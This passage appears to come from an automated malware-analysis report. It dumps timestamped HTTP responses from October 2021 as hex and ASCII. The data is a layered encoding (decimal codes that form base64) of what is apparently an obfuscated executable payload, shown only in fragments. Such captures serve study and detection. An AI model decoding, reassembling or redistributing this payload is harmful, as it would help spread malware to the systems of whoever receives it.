                    Data Ascii: 0 80 0 52 0 68 0 65 0 65 0 67 0 76 0 120 0 117 0 104 0 120 0 54 0 47 0 47 0 47 0 105 0 52 0 89 0 111 0 87 0 119 0 65 0 65 0 103 0 47 0 103 0 70 0 88 0 51 0 81 0 74 0 103 0 47 0 103 0 71 0 100 0 65 0 81 0 122 0 119 0 79 0 115 0 68 0 77 0 56 0 66 0 65 0 85
                    2021-10-26 16:59:38 UTC2868INData Raw: 31 31 31 20 30 20 36 37 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 31 32 32 20 30 20 38 34 20 30 20 37 31 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 31 31 39 20 30 20 34 33 20 30 20 31 30 34 20 30 20 31 31 38 20 30 20 35 34 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 39 37 20 30 20 36 36 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 31 35 20 30 20 34 39 20 30 20 36 36 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 36 20 30 20 31 30 35 20 30 20 35 36 20 30 20 38 30 20 30 20 31 31 31 20 30 20 38 38 20 30 20 37 39 20 30 20 31 30 36 20 30 20 34 37 20 30
                    Data Ascii: 111 0 67 0 119 0 81 0 65 0 65 0 73 0 50 0 122 0 84 0 71 0 77 0 65 0 65 0 70 0 87 0 76 0 119 0 43 0 104 0 118 0 54 0 80 0 47 0 47 0 97 0 66 0 69 0 69 0 65 0 65 0 67 0 78 0 115 0 49 0 66 0 106 0 65 0 65 0 66 0 86 0 105 0 56 0 80 0 111 0 88 0 79 0 106 0 47 0
                    2021-10-26 16:59:38 UTC2872INData Raw: 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 34 39 20 30 20 39 30 20 30 20 38 34 20 30 20 38 35 20 30 20 35 30 20 30 20 31 30 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 31 30 35 20 30 20 35 36 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 35 32 20 30 20 37 39 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 37 38 20 30 20 38 37 20 30 20 38 35 20 30 20 34 39 20 30 20 37 38 20 30 20 31 31 31 20 30 20 35 34 20 30 20 31 30 33 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 32 20 30 20 35 34 20 30 20 37 37
                    Data Ascii: 0 118 0 47 0 47 0 85 0 49 0 90 0 84 0 85 0 50 0 106 0 112 0 65 0 119 0 65 0 65 0 47 0 51 0 88 0 56 0 105 0 56 0 102 0 111 0 52 0 79 0 114 0 47 0 47 0 49 0 78 0 87 0 85 0 49 0 78 0 111 0 54 0 103 0 77 0 65 0 65 0 80 0 57 0 49 0 47 0 73 0 118 0 72 0 54 0 77
                    2021-10-26 16:59:38 UTC2876INData Raw: 30 20 37 30 20 30 20 34 39 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 31 20 30 20 38 34 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 31 30 37 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 39 20 30 20 31 30 34 20 30 20 34 39 20 30 20 38 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 32 20 30 20 37 33 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 35 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 39 20
                    Data Ascii: 0 70 0 49 0 115 0 65 0 65 0 67 0 78 0 104 0 101 0 84 0 118 0 47 0 47 0 57 0 81 0 106 0 89 0 88 0 107 0 51 0 47 0 47 0 47 0 85 0 80 0 57 0 49 0 47 0 79 0 104 0 49 0 87 0 81 0 65 0 65 0 103 0 56 0 82 0 73 0 47 0 51 0 88 0 56 0 47 0 120 0 85 0 85 0 119 0 69
                    2021-10-26 16:59:38 UTC2880INData Raw: 30 20 38 36 20 30 20 31 31 33 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 35 32 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 35 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 37 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 35 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 30 20 30 20 31 30 30 20 30 20 31 31 31 20 30 20 37 37 20 30 20 37 37 20 30 20 34 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 36 35 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30 20 34
                    Data Ascii: 0 86 0 113 0 77 0 66 0 65 0 65 0 73 0 118 0 52 0 106 0 89 0 85 0 65 0 43 0 80 0 47 0 47 0 85 0 79 0 103 0 77 0 47 0 47 0 47 0 47 0 106 0 89 0 85 0 65 0 43 0 80 0 47 0 47 0 85 0 70 0 100 0 111 0 77 0 77 0 49 0 65 0 65 0 73 0 50 0 70 0 65 0 80 0 68 0 47 0 4
                    2021-10-26 16:59:38 UTC2884INData Raw: 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 37 30 20 30 20 38 32 20 30 20 38 35 20 30 20 34 39 20 30 20 39 30 20 30 20 38 38 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 38 20 30 20 38 31 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 38 37 20 30 20 38 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 35 37 20 30 20 31 31 36 20 30 20 38 34 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 35 32 20 30 20 39 37 20 30 20 36 39 20 30 20 38 39 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20
                    Data Ascii: 0 76 0 55 0 70 0 70 0 82 0 85 0 49 0 90 0 88 0 47 0 51 0 85 0 77 0 47 0 51 0 85 0 73 0 47 0 120 0 88 0 81 0 119 0 85 0 65 0 65 0 105 0 122 0 87 0 89 0 119 0 85 0 65 0 65 0 77 0 57 0 116 0 84 0 85 0 52 0 118 0 52 0 97 0 69 0 89 0 66 0 65 0 65 0 66 0 88 0
                    2021-10-26 16:59:38 UTC2888INData Raw: 36 20 30 20 37 38 20 30 20 34 39 20 30 20 36 36 20 30 20 35 32 20 30 20 31 31 35 20 30 20 37 31 20 30 20 35 34 20 30 20 31 30 32 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 39 38 20 30 20 38 32 20 30 20 38 31 20 30 20 31 30 35 20 30 20 37 38 20 30 20 38 32 20 30 20 34 37 20 30 20 34 33 20 30 20 37 34 20 30 20 38 32 20 30 20 36 37 20 30 20 38 31 20 30 20 37 33 20 30 20 38 35 20 30 20 31 30 30 20 30 20 31 31 32 20 30 20 34 39 20 30 20 36 38 20 30 20 37 30 20 30 20 37 32 20 30 20 31 30 30 20 30 20 38 38 20 30 20 36 37 20 30 20 38 31 20 30 20 31 30 33 20 30 20 35 30 20 30 20 34 38 20 30 20 38 31 20 30 20 31 30 37 20 30 20 36 39 20 30 20 37 38 20 30 20 34 39 20 30 20 39 39 20 30 20 37 34 20 30 20 36 36 20 30 20 31 30
                    Data Ascii: 6 0 78 0 49 0 66 0 52 0 115 0 71 0 54 0 102 0 103 0 65 0 65 0 65 0 68 0 98 0 82 0 81 0 105 0 78 0 82 0 47 0 43 0 74 0 82 0 67 0 81 0 73 0 85 0 100 0 112 0 49 0 68 0 70 0 72 0 100 0 88 0 67 0 81 0 103 0 50 0 48 0 81 0 107 0 69 0 78 0 49 0 99 0 74 0 66 0 10
                    2021-10-26 16:59:38 UTC2893INData Raw: 20 38 36 20 30 20 39 30 20 30 20 38 38 20 30 20 31 31 38 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 31 31 39 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 30 20 30 20 37 39 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 36 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37 31 20 30 20 34 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 39 38 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 36 20 30 20 38 39 20 30 20
                    Data Ascii: 86 0 90 0 88 0 118 0 52 0 65 0 65 0 65 0 65 0 66 0 88 0 106 0 89 0 88 0 119 0 47 0 118 0 47 0 47 0 85 0 70 0 79 0 78 0 82 0 102 0 66 0 81 0 97 0 103 0 71 0 43 0 65 0 65 0 81 0 65 0 65 0 70 0 98 0 47 0 70 0 101 0 106 0 65 0 81 0 65 0 66 0 88 0 106 0 89 0
                    2021-10-26 16:59:38 UTC2897INData Raw: 20 30 20 31 31 36 20 30 20 31 30 39 20 30 20 31 31 33 20 30 20 35 32 20 30 20 31 31 36 20 30 20 37 30 20 30 20 36 37 20 30 20 36 35 20 30 20 34 33 20 30 20 35 30 20 30 20 36 36 20 30 20 36 35 20 30 20 37 38 20 30 20 38 31 20 30 20 39 37 20 30 20 37 32 20 30 20 31 32 32 20 30 20 37 38 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 31 20 30 20 31 30 34 20 30 20 31 31 33 20 30 20 36 37 20 30 20 31 30 38 20 30 20 36 38 20 30 20 31 31 31 20 30 20 39 39 20 30 20 35 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 37 31 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 31 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33 20 30
                    Data Ascii: 0 116 0 109 0 113 0 52 0 116 0 70 0 67 0 65 0 43 0 50 0 66 0 65 0 78 0 81 0 97 0 72 0 122 0 78 0 81 0 65 0 67 0 78 0 82 0 101 0 104 0 113 0 67 0 108 0 68 0 111 0 99 0 50 0 65 0 65 0 65 0 71 0 111 0 71 0 106 0 85 0 88 0 111 0 85 0 80 0 57 0 49 0 47 0 73 0
                    2021-10-26 16:59:38 UTC2900INData Raw: 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 30 20 30 20 31 30 38 20 30 20 39 30 20 30 20 31 30 30 20 30 20 38 31 20 30 20 37 38 20 30 20 37 32 20 30 20 35 34 20 30 20 34 33 20 30 20 37 35 20 30 20 37 36 20 30 20 36 36 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 37 38 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 38 20 30 20 35 31 20 30 20 37 35 20 30 20 34 37 20 30 20 36 36 20 30 20 37 34 20 30 20 37 39 20 30 20 34 37 20 30 20 37 30 20 30 20 34 33 20 30 20 36 35 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 31 32 30 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 33 20 30 20 38 33 20 30 20 36 38 20 30 20 38 30 20 30 20 37 34 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 33 20
                    Data Ascii: 1 0 65 0 65 0 67 0 70 0 119 0 70 0 108 0 90 0 100 0 81 0 78 0 72 0 54 0 43 0 75 0 76 0 66 0 111 0 116 0 78 0 68 0 73 0 118 0 51 0 75 0 47 0 66 0 74 0 79 0 47 0 70 0 43 0 65 0 111 0 118 0 120 0 104 0 102 0 90 0 43 0 83 0 68 0 80 0 74 0 104 0 102 0 90 0 43
                    2021-10-26 16:59:38 UTC2904INData Raw: 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 37 34 20 30 20 31 30 32 20 30 20 36 36 20 30 20 37 33 20 30 20 35 35 20 30 20 38 33 20 30 20 36 36 20 30 20 31 32 30 20 30 20 35 37 20 30 20 36 38 20 30 20 38 39 20 30 20 31 31 36 20 30 20 38 31 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 35 20 30 20 37 37 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 36 35 20 30 20 36 39 20 30 20 37 33 20 30 20 34 38 20 30 20 36 39 20 30 20 38 33 20 30 20 37 37 20 30 20 37 37 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 37 20 30 20 37 39 20 30 20 36 38 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 33 20 30 20 37 36 20 30 20 38 33 20 30 20 36 35 20 30 20 31 32 30 20 30 20 38 37 20 30 20 38 36 20 30 20 35 32 20 30 20 34
                    Data Ascii: 0 73 0 69 0 65 0 73 0 88 0 74 0 102 0 66 0 73 0 55 0 83 0 66 0 120 0 57 0 68 0 89 0 116 0 81 0 68 0 73 0 115 0 77 0 105 0 111 0 116 0 65 0 69 0 73 0 48 0 69 0 83 0 77 0 77 0 122 0 119 0 77 0 79 0 68 0 43 0 118 0 43 0 76 0 83 0 65 0 120 0 87 0 86 0 52 0 4
                    2021-10-26 16:59:38 UTC2908INData Raw: 34 39 20 30 20 37 30 20 30 20 34 38 20 30 20 37 39 20 30 20 31 30 35 20 30 20 35 33 20 30 20 34 37 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 38 20 30 20 31 30 33 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 37 20 30 20 34 38 20 30 20 31 30 31 20 30 20 37 33 20 30 20 31 31 36 20 30 20 34 39 20 30 20 36 38 20 30 20 36 39 20 30 20 31 30 31 20 30 20 37 34 20 30 20 31 30 32 20 30 20 31 30 32 20 30 20 31 30 35 20 30 20 37 34 20 30 20 38 38 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 34 37 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 38 20 30 20 36 36 20 30 20 36 39 20 30 20 39 30 20 30 20 31 30 39 20 30 20 37 39 20 30 20 38 32 20
                    Data Ascii: 49 0 70 0 48 0 79 0 105 0 53 0 47 0 102 0 47 0 47 0 105 0 48 0 88 0 103 0 90 0 111 0 107 0 48 0 101 0 73 0 116 0 49 0 68 0 69 0 101 0 74 0 102 0 102 0 105 0 74 0 88 0 101 0 122 0 47 0 82 0 102 0 67 0 76 0 82 0 102 0 67 0 78 0 66 0 69 0 90 0 109 0 79 0 82
                    2021-10-26 16:59:38 UTC2912INData Raw: 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 30 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 31 32 20 30 20 37 33 20 30 20 38 36 20 30 20 35 31 20 30 20 34 38 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 34 38 20 30 20 38 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 37 20 30 20 38 36 20 30 20 34 37 20 30 20 35 36 20 30 20 38 36 20 30 20 36 35 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 31 31 34 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31
                    Data Ascii: 0 65 0 65 0 67 0 47 0 120 0 87 0 119 0 119 0 69 0 65 0 65 0 105 0 47 0 105 0 70 0 47 0 51 0 81 0 112 0 73 0 86 0 51 0 48 0 106 0 85 0 88 0 48 0 85 0 71 0 111 0 67 0 86 0 47 0 56 0 86 0 65 0 77 0 66 0 65 0 65 0 73 0 88 0 65 0 100 0 65 0 114 0 47 0 100 0 1
                    2021-10-26 16:59:38 UTC2916INData Raw: 30 20 36 38 20 30 20 38 39 20 30 20 36 37 20 30 20 38 35 20 30 20 38 30 20 30 20 35 36 20 30 20 34 39 20 30 20 38 38 20 30 20 37 37 20 30 20 38 32 20 30 20 36 36 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 31 31 39 20 30 20 31 30 38 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 35 20 30 20 37 30 20 30 20 31 31 31 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 34 39 20 30 20 31 31 35 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 32 30 20 30 20 38 36 20 30 20 31 30 37 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 31 20 30 20 31 32 31 20 30 20 36 37 20 30 20 31 31
                    Data Ascii: 0 68 0 89 0 67 0 85 0 80 0 56 0 49 0 88 0 77 0 82 0 66 0 65 0 70 0 102 0 111 0 119 0 108 0 85 0 65 0 65 0 75 0 70 0 111 0 120 0 69 0 69 0 65 0 105 0 119 0 49 0 115 0 120 0 69 0 69 0 65 0 105 0 120 0 86 0 107 0 120 0 69 0 69 0 65 0 105 0 81 0 121 0 67 0 11
                    2021-10-26 16:59:38 UTC2920INData Raw: 31 31 31 20 30 20 36 35 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 39 38 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 31 31 33 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 36 36 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 35 34 20 30 20 37 35 20 30 20 38 36 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 31 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 36 36 20 30 20 38 31 20 30 20 35 34 20 30 20 36 37 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 37 20 30 20 36 38 20 30 20 37
                    Data Ascii: 111 0 65 0 85 0 79 0 103 0 98 0 85 0 119 0 65 0 65 0 97 0 103 0 113 0 78 0 82 0 99 0 66 0 81 0 47 0 51 0 85 0 73 0 54 0 75 0 86 0 84 0 65 0 65 0 68 0 47 0 100 0 81 0 121 0 78 0 82 0 99 0 66 0 81 0 54 0 67 0 111 0 65 0 65 0 65 0 67 0 68 0 120 0 67 0 68 0 7
                    2021-10-26 16:59:38 UTC2925INData Raw: 30 20 38 38 20 30 20 39 39 20 30 20 37 38 20 30 20 38 36 20 30 20 31 30 35 20 30 20 34 33 20 30 20 31 32 31 20 30 20 35 32 20 30 20 36 36 20 30 20 36 37 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 36 20 30 20 34 38 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 38 20 30 20 39 39 20 30 20 31 32 32 20 30 20 35 37 20 30 20 31 30 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 34 33 20 30 20 35 31 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 31 30 38 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 39 38 20 30 20 38 38 20 30 20 35 36 20 30 20
                    Data Ascii: 0 88 0 99 0 78 0 86 0 105 0 43 0 121 0 52 0 66 0 67 0 73 0 65 0 65 0 79 0 106 0 48 0 85 0 119 0 65 0 65 0 86 0 108 0 99 0 122 0 57 0 109 0 103 0 65 0 73 0 65 0 65 0 65 0 106 0 89 0 88 0 43 0 51 0 102 0 47 0 47 0 86 0 108 0 66 0 109 0 105 0 98 0 88 0 56 0
                    2021-10-26 16:59:38 UTC2929INData Raw: 20 34 33 20 30 20 38 31 20 30 20 34 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 34 33 20 30 20 31 30 35 20 30 20 38 38 20 30 20 38 34 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 38 30 20 30 20 38 34 20 30 20 37 38 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 34 33 20 30 20 31 31 31 20 30 20 38 30 20 30 20 34 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 39 38 20 30 20 31 31 31 20 30 20 31 30 34 20 30 20 34 38 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 36 39 20 30 20 37 30 20 30 20 31 30 30 20 30 20 31 31 33 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 31 31 31 20 30 20 31 32 32 20 30 20 31 30 37 20 30 20 36 35 20
                    Data Ascii: 43 0 81 0 43 0 48 0 65 0 65 0 86 0 43 0 105 0 88 0 84 0 103 0 65 0 65 0 97 0 80 0 84 0 78 0 81 0 65 0 67 0 43 0 111 0 80 0 49 0 65 0 65 0 70 0 98 0 111 0 104 0 48 0 52 0 65 0 65 0 73 0 80 0 69 0 69 0 70 0 100 0 113 0 65 0 71 0 103 0 111 0 122 0 107 0 65
                    2021-10-26 16:59:38 UTC2932INData Raw: 20 34 39 20 30 20 31 30 39 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 31 32 32 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 34 33 20 30 20 31 30 36 20 30 20 38 30 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 35 34 20 30 20 37 36 20 30 20 36 38 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 35 20 30 20 31 32 30 20 30 20 31 30 39 20 30 20 31 30 33 20 30 20 31 32 31 20 30 20 38 37 20 30 20 38 31 20 30 20 34 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 35 37 20 30 20 31 30 31 20 30 20 38 37 20 30 20 35 36 20 30 20 31 31 30 20 30 20 36 38 20 30 20 38 36
                    Data Ascii: 49 0 109 0 106 0 107 0 122 0 85 0 65 0 65 0 85 0 43 0 106 0 80 0 84 0 65 0 65 0 65 0 47 0 51 0 85 0 73 0 54 0 76 0 68 0 57 0 47 0 47 0 43 0 68 0 120 0 65 0 120 0 109 0 103 0 121 0 87 0 81 0 43 0 48 0 65 0 65 0 65 0 70 0 57 0 101 0 87 0 56 0 110 0 68 0 86
                    2021-10-26 16:59:38 UTC2936INData Raw: 20 30 20 31 30 37 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 39 20 30 20 37 36 20 30 20 31 30 30 20 30 20 31 32 30 20 30 20 36 37 20 30 20 37 30 20 30 20 35 37 20 30 20 31 31 30 20 30 20 38 31 20 30 20 37 37 20 30 20 35 34 20 30 20 38 30 20 30 20 31 30 36 20 30 20 31 31 36 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 35 34 20 30 20 37 34 20 30 20 37 38 20 30 20 37 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 39 30 20 30 20 31 30 35 20 30 20 35 31 20 30 20 39 39 20 30 20 37 37 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 38 20 30 20 36 38 20 30 20 37 39 20 30 20 31 30 36 20 30 20 31 30 38 20 30 20 35 35 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20
                    Data Ascii: 0 107 0 111 0 65 0 65 0 70 0 109 0 76 0 100 0 120 0 67 0 70 0 57 0 110 0 81 0 77 0 54 0 80 0 106 0 116 0 47 0 47 0 57 0 87 0 54 0 74 0 78 0 75 0 65 0 65 0 66 0 90 0 105 0 51 0 99 0 77 0 104 0 102 0 90 0 48 0 68 0 79 0 106 0 108 0 55 0 102 0 47 0 47 0 86
                    2021-10-26 16:59:38 UTC2940INData Raw: 20 35 34 20 30 20 31 31 39 20 30 20 37 33 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 33 20 30 20 31 30 39 20 30 20 37 32 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 38 30 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 36 20 30 20 35 37 20 30 20 37 37 20 30 20 31 30 35 20 30 20 38 35 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 35 20 30 20 39 30 20 30 20 34 33 20 30 20 34 38 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 30 31 20 30 20 35 32 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 30 31 20 30 20 35 36 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20
                    Data Ascii: 54 0 119 0 73 0 122 0 119 0 73 0 109 0 72 0 119 0 65 0 73 0 65 0 65 0 68 0 80 0 65 0 105 0 86 0 57 0 77 0 105 0 85 0 100 0 81 0 105 0 90 0 43 0 48 0 65 0 103 0 65 0 65 0 105 0 89 0 101 0 52 0 65 0 103 0 65 0 65 0 105 0 89 0 101 0 56 0 65 0 103 0 65 0 65
                    2021-10-26 16:59:38 UTC2944INData Raw: 20 31 30 32 20 30 20 38 31 20 30 20 31 32 30 20 30 20 35 36 20 30 20 35 32 20 30 20 38 37 20 30 20 39 38 20 30 20 35 31 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 38 31 20 30 20 31 30 30 20 30 20 38 31 20 30 20 38 37 20 30 20 37 36 20 30 20 31 30 32 20 30 20 31 30 37 20 30 20 38 34 20 30 20 31 31 34 20 30 20 36 35 20 30 20 35 32 20 30 20 31 31 36 20 30 20 34 33 20 30 20 38 33 20 30 20 38 30 20 30 20 34 33 20 30 20 35 30 20 30 20 31 31 31 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 34 20 30 20 34 33 20 30 20 31 32 30 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 35 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 38 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20
